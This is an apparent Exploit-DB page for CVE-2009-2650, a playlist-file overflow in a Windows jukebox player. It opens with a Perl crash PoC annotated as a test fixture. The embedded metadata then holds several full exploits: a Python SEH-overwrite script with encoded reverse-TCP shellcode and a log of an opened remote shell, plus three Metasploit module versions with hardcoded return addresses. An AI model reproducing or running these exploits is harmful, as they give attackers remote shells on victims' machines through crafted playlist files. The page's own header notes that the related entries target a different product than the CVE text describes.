ID EDB-ID:9173
Type exploitdb
Reporter hack4love
Modified 2009-07-16T00:00:00
Description
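MultiMedia Jukebox 4.0 Build 020124 (.pst / .m3u) Heap Overflow PoC. CVE-2009-2650. DoS exploit for the Windows platform. The PoC below only crashes the application; the CVE record reproduced further down also lists possible arbitrary code execution through a crafted playlist file, so the issue is not limited to denial of service. The related entries listed on this page target Media Jukebox 8.0.400 and describe a stack overflow, which differs from the product and bug class named in the CVE text, so confirm the affected product before relying on them for triage.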
#!/usr/bin/perl
# Found By :: HACK4LOVE
# MultiMedia Jukebox 4.0 Build 020124 (.pst / .m3u ) Local Heap Overflow PoC
# http://www.brothersoft.com/sorcerer-software-multimedia-jukebox-251913.html
########################################################################################
# special thanks for sec-code.com and sniper code
########################################################################################
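use strict;
use warnings;

# Crash-reproduction fixture for CVE-2009-2650 (MultiMedia Jukebox 4.0
# Build 020124, .m3u playlist handling).
#
# The generated file is a single unbroken run of 0x41 ('A') bytes with no
# playlist structure and no payload; it only shows that the application
# fails on an over-long playlist entry.  Typical defensive uses are a
# regression input for a patched or replacement parser, and a sample for
# content filters that flag playlist files made of one multi-kilobyte line.
#
# NOTE(review): 5000 is the length used in the original report; the page
# does not state the real buffer size, so treat it as "known to crash",
# not as a boundary value.
my $filler_length = 5000;
my $output_file   = 'hack4love.m3u';
my $crash         = "\x41" x $filler_length;

# Three-argument open with a lexical handle instead of the bareword,
# two-argument form.  The file is truncated ('>') rather than appended to
# ('>>'), so repeated runs always yield the same 5000-byte fixture instead
# of a file that grows on every run.
open(my $out, '>', $output_file)
    or die "cannot open $output_file for writing: $!";

# Check every I/O step: buffered write errors may only surface at close.
print {$out} $crash
    or die "cannot write to $output_file: $!";
close($out)
    or die "cannot close $output_file: $!";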
########################################################################################
# milw0rm.com [2009-07-16]
{"id": "EDB-ID:9173", "type": "exploitdb", "bulletinFamily": "exploit", "title": "MultiMedia Jukebox 4.0 Build 020124 - .pst / .m3u Heap Overflow PoC", "description": "MultiMedia Jukebox 4.0 Build 020124 (.pst / .m3u) Heap Overflow PoC. CVE-2009-2650. Dos exploit for windows platform", "published": "2009-07-16T00:00:00", "modified": "2009-07-16T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/9173/", "reporter": "hack4love", "references": [], "cvelist": ["CVE-2009-2650"], "lastseen": "2016-02-01T10:02:09", "viewCount": 7, "enchantments": {"score": {"value": 7.1, "vector": "NONE", "modified": "2016-02-01T10:02:09", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2650"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:84549"]}, {"type": "exploitdb", "idList": ["EDB-ID:10744", "EDB-ID:16620", "EDB-ID:9551"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/MEDIAJUKEBOX"]}], "modified": "2016-02-01T10:02:09", "rev": 2}, "vulnersScore": 7.1}, "sourceHref": "https://www.exploit-db.com/download/9173/", "sourceData": "#!/usr/bin/perl\n# Found By :: HACK4LOVE\n# MultiMedia Jukebox 4.0 Build 020124 (.pst / .m3u ) Local Heap Overflow PoC\n# http://www.brothersoft.com/sorcerer-software-multimedia-jukebox-251913.html\n########################################################################################\n# special thanks for sec-code.com and sniper code\n########################################################################################\nmy $crash=\"\\x41\" x 5000;\nopen(myfile,'>>hack4love.m3u');\nprint myfile $crash;\n########################################################################################\n\n# milw0rm.com [2009-07-16]\n", "osvdbidlist": ["55924"]}
{"cve": [{"lastseen": "2020-10-03T11:54:15", "description": "Heap-based buffer overflow in Sorcerer Software MultiMedia Jukebox 4.0 Build 020124 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted (1) .m3u or possibly (2) .pst file.", "edition": 3, "cvss3": {}, "published": "2009-07-30T19:30:00", "title": "CVE-2009-2650", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-2650"], "modified": "2017-09-19T01:29:00", "cpe": ["cpe:/a:sorcerersoftware:multimedia_jukebox:4.0"], "id": "CVE-2009-2650", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2650", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:sorcerersoftware:multimedia_jukebox:4.0:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-01T10:50:55", "description": "Media Jukebox 8 (.pls) Universal Local Buffer Exploit (SEH). CVE-2009-2650. 
Local exploit for windows platform", "published": "2009-08-31T00:00:00", "type": "exploitdb", "title": "Media Jukebox 8 - .pls Universal Local Buffer Exploit SEH", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2650"], "modified": "2009-08-31T00:00:00", "id": "EDB-ID:9551", "href": "https://www.exploit-db.com/exploits/9551/", "sourceData": "#!/usr/bin/python\n#\n# ######################################################################\n#\n# Media Jukebox 8 (.pls) Universal Local Buffer Exploit (SEH)\n# Author: mr_me\n# Download: http://download.chip.eu/en/Media-Jukebox-8.0.400_76134.html\n# Note: we needed a header to trigger this one ;) \n# Tested on: Wind0ws XP and Vist@\n# Greetz: offensive-security, I tried harder :) \n# \n# ######################################################################\n#\n# msf exploit(handler) > exploit\n#\n# [*] Handler binding to LHOST 0.0.0.0\n# [*] Started reverse handler\n# [*] Starting the payload handler...\n# [*] Sending stage (474 bytes)\n# [*] Command shell session 3 opened (192.168.0.2:4444 -> 192.168.0.4:1246)\n#\n# Microsoft Windows XP [Version 5.1.2600]\n# (C) Copyright 1985-2001 Microsoft Corp.\n#\n# C:\\Program Files> \n#\n\ndef banner():\n\tprint \"\\n|-------------------------------------------------------------|\" \n\tprint \"| Media Jukebox 8 (.pls) Universal Local Buffer Exploit (SEH) |\" \n\tprint \"| by MrMe 09/09 |\"\n\tprint \"|-------------------------------------------------------------|\\n\"\n\n# windows/shell/reverse_tcp - 617 bytes (stage 1)\n# http://www.metasploit.com\n# Encoder: x86/alpha_mixed\n# LHOST=192.168.0.2, EXITFUNC=seh, LPORT=4444\n\nsc = 
(\"\\xda\\xc8\\xd9\\x74\\x24\\xf4\\x5b\\x53\\x59\\x49\\x49\\x49\\x49\\x49\\x49\"\n\"\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51\\x5a\\x6a\\x41\"\n\"\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\"\n\"\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x4b\"\n\"\\x4c\\x4d\\x38\\x50\\x56\\x45\\x50\\x45\\x50\\x43\\x30\\x51\\x43\\x50\\x55\"\n\"\\x46\\x36\\x50\\x57\\x4c\\x4b\\x42\\x4c\\x46\\x44\\x45\\x48\\x4c\\x4b\\x47\"\n\"\\x35\\x47\\x4c\\x4c\\x4b\\x50\\x54\\x44\\x45\\x42\\x58\\x45\\x51\\x4b\\x5a\"\n\"\\x4c\\x4b\\x51\\x5a\\x44\\x58\\x4c\\x4b\\x50\\x5a\\x47\\x50\\x43\\x31\\x4a\"\n\"\\x4b\\x4b\\x53\\x46\\x52\\x47\\x39\\x4c\\x4b\\x47\\x44\\x4c\\x4b\\x43\\x31\"\n\"\\x4a\\x4e\\x46\\x51\\x4b\\x4f\\x4b\\x4c\\x50\\x31\\x49\\x50\\x4e\\x4c\\x46\"\n\"\\x58\\x4d\\x30\\x42\\x54\\x44\\x47\\x49\\x51\\x48\\x4f\\x44\\x4d\\x43\\x31\"\n\"\\x49\\x57\\x4a\\x4b\\x4c\\x32\\x47\\x4b\\x43\\x4c\\x46\\x44\\x45\\x44\\x42\"\n\"\\x55\\x4b\\x51\\x4c\\x4b\\x51\\x4a\\x47\\x54\\x45\\x51\\x4a\\x4b\\x45\\x36\"\n\"\\x4c\\x4b\\x44\\x4c\\x50\\x4b\\x4c\\x4b\\x50\\x5a\\x45\\x4c\\x45\\x51\\x4a\"\n\"\\x4b\\x4c\\x4b\\x45\\x54\\x4c\\x4b\\x43\\x31\\x4b\\x58\\x4a\\x4b\\x45\\x52\"\n\"\\x50\\x31\\x49\\x50\\x51\\x4f\\x51\\x4e\\x51\\x4d\\x51\\x4b\\x49\\x52\\x44\"\n\"\\x48\\x45\\x50\\x51\\x4e\\x43\\x5a\\x46\\x50\\x50\\x59\\x45\\x34\\x4c\\x4b\"\n\"\\x45\\x49\\x4c\\x4b\\x51\\x4b\\x44\\x4c\\x4c\\x4b\\x51\\x4b\\x45\\x4c\\x4c\"\n\"\\x4b\\x45\\x4b\\x4c\\x4b\\x51\\x4b\\x45\\x58\\x51\\x43\\x43\\x58\\x4c\\x4e\"\n\"\\x50\\x4e\\x44\\x4e\\x4a\\x4c\\x4b\\x4f\\x48\\x56\\x4c\\x49\\x48\\x47\\x51\"\n\"\\x43\\x45\\x38\\x51\\x44\\x49\\x5a\\x4e\\x4f\\x4c\\x51\\x4b\\x4f\\x49\\x46\"\n\"\\x4b\\x31\\x4a\\x4c\\x43\\x30\\x45\\x51\\x45\\x50\\x43\\x30\\x50\\x50\\x51\"\n\"\\x47\\x51\\x46\\x51\\x43\\x4b\\x39\\x4b\\x55\\x4a\\x48\\x45\\x4f\\x43\\x30\"\n\"\\x45\\x50\\x43\\x30\\x4a\\x30\\x43\\x31\\x43\\x30\\x43\\x30\\x4e\\x56\\x42\"\n\"\\x39\\x44\\x58\\x4b\\x57\\x4e\\x44\\x44\\x59\\x42\\x
50\\x4b\\x59\\x4a\\x4c\"\n\"\\x4c\\x39\\x4e\\x4a\\x45\\x30\\x4e\\x39\\x45\\x59\\x4b\\x45\\x4e\\x4d\\x48\"\n\"\\x4b\\x4a\\x4d\\x4b\\x4c\\x47\\x4b\\x46\\x37\\x50\\x53\\x50\\x32\\x51\\x4f\"\n\"\\x46\\x53\\x46\\x52\\x43\\x30\\x51\\x4b\\x4c\\x4d\\x50\\x4b\\x42\\x38\\x46\"\n\"\\x31\\x4b\\x4f\\x49\\x47\\x4c\\x49\\x49\\x4f\\x4c\\x49\\x49\\x53\\x4c\\x4d\"\n\"\\x43\\x45\\x42\\x34\\x42\\x4a\\x45\\x55\\x50\\x59\\x50\\x51\\x46\\x33\\x4b\"\n\"\\x4f\\x50\\x34\\x4c\\x4f\\x4b\\x4f\\x51\\x45\\x43\\x34\\x51\\x49\\x4d\\x59\"\n\"\\x44\\x44\\x4c\\x4e\\x4b\\x52\\x4c\\x32\\x46\\x4b\\x51\\x37\\x46\\x34\\x4b\"\n\"\\x4f\\x47\\x47\\x4b\\x4f\\x51\\x45\\x51\\x38\\x50\\x31\\x49\\x50\\x46\\x30\"\n\"\\x46\\x30\\x46\\x30\\x50\\x50\\x51\\x50\\x46\\x30\\x47\\x30\\x50\\x50\\x4b\"\n\"\\x4f\\x51\\x45\\x47\\x54\\x4d\\x59\\x48\\x47\\x43\\x58\\x49\\x50\\x49\\x38\"\n\"\\x45\\x50\\x43\\x32\\x42\\x48\\x43\\x32\\x43\\x30\\x42\\x31\\x51\\x4c\\x4d\"\n\"\\x59\\x4b\\x51\\x43\\x5a\\x44\\x50\\x46\\x31\\x51\\x47\\x4b\\x4f\\x51\\x45\"\n\"\\x51\\x30\\x42\\x4a\\x51\\x50\\x51\\x4e\\x46\\x36\\x49\\x51\\x4a\\x46\\x44\"\n\"\\x46\\x46\\x36\\x49\\x51\\x4d\\x36\\x45\\x58\\x50\\x56\\x43\\x5a\\x43\\x30\"\n\"\\x4b\\x4f\\x46\\x35\\x44\\x4c\\x4b\\x39\\x48\\x43\\x43\\x5a\\x43\\x30\\x50\"\n\"\\x56\\x46\\x33\\x51\\x47\\x4b\\x4f\\x51\\x45\\x42\\x38\\x4b\\x4f\\x4e\\x33\"\n\"\\x41\\x41\")\n\nheader = (\"[playlist]\\n\");\nheader += (\"NumberOfEntries=3\\n\\n\");\nheader += (\"File1=http://\");\t# give a dummy header to trick the app\ncrash = (\"\\x41\" * 262);\t\t# overwrite the buffer at 262 bytes\njmp = (\"\\xeb\\x06\\x90\\x90\"); \t# short jump over SEH handler\nseh = (\"\\x6f\\x29\\x01\\x10\"); \t# universal p/p/r from wnaspi32.dll\nnops = (\"\\x90\" * 5);\t\t# nop sled for easy landing\njunk = (\"\\xCC\" * 500);\t\t# gotta make the size seem real ;) \n\nbuff = header + crash + jmp + seh + nops + sc + junk\nbanner()\n\ntry:\n\tfile = open('mr_mes-wicked_miX.pl','w');\n\tfile.write(buff);\n\tfile.close();\n\tprint \"[+] File created 
successfully: mr_mes-wicked_miX.pls\\n\";\nexcept:\n\tprint \"[-] Error cant write file to system\\n\";\n\n# milw0rm.com [2009-08-31]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/9551/"}, {"lastseen": "2016-02-02T06:06:08", "description": "Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH). CVE-2009-2650. Local exploit for windows platform", "published": "2011-01-08T00:00:00", "type": "exploitdb", "title": "Media Jukebox 8.0.400 - Buffer Overflow Exploit SEH", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2650"], "modified": "2011-01-08T00:00:00", "id": "EDB-ID:16620", "href": "https://www.exploit-db.com/exploits/16620/", "sourceData": "##\r\n# $Id: mediajukebox.rb 11516 2011-01-08 01:13:26Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in Media Jukebox 8.0.400\r\n\t\t\t\tBy creating a specially crafted m3u or pls file, an an attacker may be able\r\n\t\t\t\tto execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Ron Henry <rlh[at]ciphermonk.net>',\r\n\t\t\t\t\t'dijital1',\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 11516 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'OSVDB', '55924' ],\r\n\t\t\t\t\t[ 'CVE', 
'2009-2650']\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'seh',\r\n\t\t\t\t\t'DisablePayloadHandler' => 'true',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 3000,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\\x26\\x3d\\x2b\\x3f\\x3a\\x3b\\x2d\\x2c\\x2f\\x23\\x2e\\x5c\\x30\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows XP SP3 - English', { 'Ret' => 0x02951457} ], \t\t# 0x02951457 pop, pop, ret dsp_mjMain.dll\r\n\t\t\t\t\t[ 'Windows XP SP2 - English', { 'Ret' => 0x02291457} ], \t\t# 0x02291457 pop, pop, ret dsp_mjMain.dll\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => 'July 1 2009',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [ false, 'The file name.', 'metasploit.m3u']),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\r\n\tdef exploit\r\n\t\tsploit = \"\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\" # \"http://\" trigger\r\n\t\tsploit << rand_text_alphanumeric(262)\r\n\t\tsploit << generate_seh_payload(target.ret)\r\n\t\tsploit << payload.encoded\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' file ...\")\r\n\t\tfile_create(sploit)\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16620/"}, {"lastseen": "2016-02-01T13:06:25", "description": "Media Jukebox 8.0.400 (seh) Buffer Overflow Exploit (meta). CVE-2009-2650. 
Local exploit for windows platform", "published": "2009-12-27T00:00:00", "type": "exploitdb", "title": "Media Jukebox 8.0.400 seh Buffer Overflow Exploit meta", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2650"], "modified": "2009-12-27T00:00:00", "id": "EDB-ID:10744", "href": "https://www.exploit-db.com/exploits/10744/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n include Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)',\r\n\t\t\t'Description' => %q{ \r\n\t\t\t\tThis module exploits a stack overflow in Media Jukebox 8.0.400\r\n\t\t\tBy creating a specially crafted m3u or pls file, an an attacker may be able\r\n\t\t\tto execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Ron Henry - <rlh [at] ciphermonk.net>',\r\n\t\t\t\t\t'dijital1',\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 7828 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'OSVDB', '' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.exploit-db.com' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'seh',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 3000,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\\x26\\x3d\\x2b\\x3f\\x3a\\x3b\\x2d\\x2c\\x2f\\x23\\x2e\\x5c\\x30\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows XP SP3 - English', { 
'Ret' => 0x02951457} ], \t\t# 0x02951457 pop, pop, ret dsp_mjMain.dll\r\n\t\t\t\t\t[ 'Windows XP SP2 - English', { 'Ret' => 0x02291457} ], \t\t# 0x02291457 pop, pop, ret dsp_mjMain.dll\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [ false, 'The file name.', 'metasploit.m3u']),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\r\n\tdef exploit\r\n\r\n sploit = \"\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\" # \"http://\" trigger\r\n\t\tsploit << rand_text_alphanumeric(262) \r\n\t\tsploit << generate_seh_payload(target.ret)\r\n\t\tsploit << payload.encoded\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' file ...\")\r\n\t\tfile_create(sploit)\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/10744/"}], "packetstorm": [{"lastseen": "2016-12-05T22:24:17", "description": "", "published": "2009-12-31T00:00:00", "type": "packetstorm", "title": "Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2650"], "modified": "2009-12-31T00:00:00", "id": "PACKETSTORM:84549", "href": "https://packetstormsecurity.com/files/84549/Media-Jukebox-8.0.400-Buffer-Overflow-Exploit-SEH.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. 
\n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::FILEFORMAT \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)', \n'Description' => %q{ \nThis module exploits a stack overflow in Media Jukebox 8.0.400 \nBy creating a specially crafted m3u or pls file, an an attacker may be able \nto execute arbitrary code. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Ron Henry <rlh[at]ciphermonk.net>', \n'dijital1', \n], \n'Version' => '$Revision: 8038 $', \n'References' => \n[ \n[ 'OSVDB', '55924' ], \n[ 'CVE', '2009-2650'] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'seh', \n}, \n'Payload' => \n{ \n'Space' => 3000, \n'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\\x26\\x3d\\x2b\\x3f\\x3a\\x3b\\x2d\\x2c\\x2f\\x23\\x2e\\x5c\\x30\", \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows XP SP3 - English', { 'Ret' => 0x02951457} ], # 0x02951457 pop, pop, ret dsp_mjMain.dll \n[ 'Windows XP SP2 - English', { 'Ret' => 0x02291457} ], # 0x02291457 pop, pop, ret dsp_mjMain.dll \n], \n'Privileged' => false, \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ false, 'The file name.', 'metasploit.m3u']), \n], self.class) \nend \n \n \ndef exploit \nsploit = \"\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\" # \"http://\" trigger \nsploit << rand_text_alphanumeric(262) \nsploit << generate_seh_payload(target.ret) \nsploit << payload.encoded \n \nprint_status(\"Creating '#{datastore['FILENAME']}' file ...\") \nfile_create(sploit) \nend \n \nend \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/84549/mediajukebox.rb.txt"}], "metasploit": [{"lastseen": 
"2020-07-20T11:05:20", "description": "This module exploits a stack buffer overflow in Media Jukebox 8.0.400 by creating a specially crafted m3u or pls file.\n", "published": "2009-12-28T04:36:25", "type": "metasploit", "title": "Media Jukebox 8.0.400 Buffer Overflow (SEH)", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2650"], "modified": "2020-01-15T01:47:27", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/MEDIAJUKEBOX", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Media Jukebox 8.0.400 Buffer Overflow (SEH)',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Media Jukebox 8.0.400\n by creating a specially crafted m3u or pls file.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Ron Henry <rlh[at]ciphermonk.net>',\n 'dijital1',\n ],\n 'References' =>\n [\n [ 'OSVDB', '55924' ],\n [ 'CVE', '2009-2650']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'seh',\n 'DisablePayloadHandler' => true\n },\n 'Payload' =>\n {\n 'Space' => 3000,\n 'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\\x26\\x3d\\x2b\\x3f\\x3a\\x3b\\x2d\\x2c\\x2f\\x23\\x2e\\x5c\\x30\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP3 - English', { 'Ret' => 0x02951457} ], \t\t# 0x02951457 pop, pop, ret dsp_mjMain.dll\n [ 'Windows XP SP2 - English', { 'Ret' => 0x02291457} ], \t\t# 0x02291457 pop, pop, ret dsp_mjMain.dll\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Jul 1 2009',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ false, 'The file name.', 'metasploit.m3u']),\n ])\n end\n\n\n def exploit\n sploit = 
\"\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\" # \"http://\" trigger\n sploit << rand_text_alphanumeric(262)\n sploit << generate_seh_payload(target.ret)\n sploit << payload.encoded\n\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\n file_create(sploit)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/mediajukebox.rb"}]}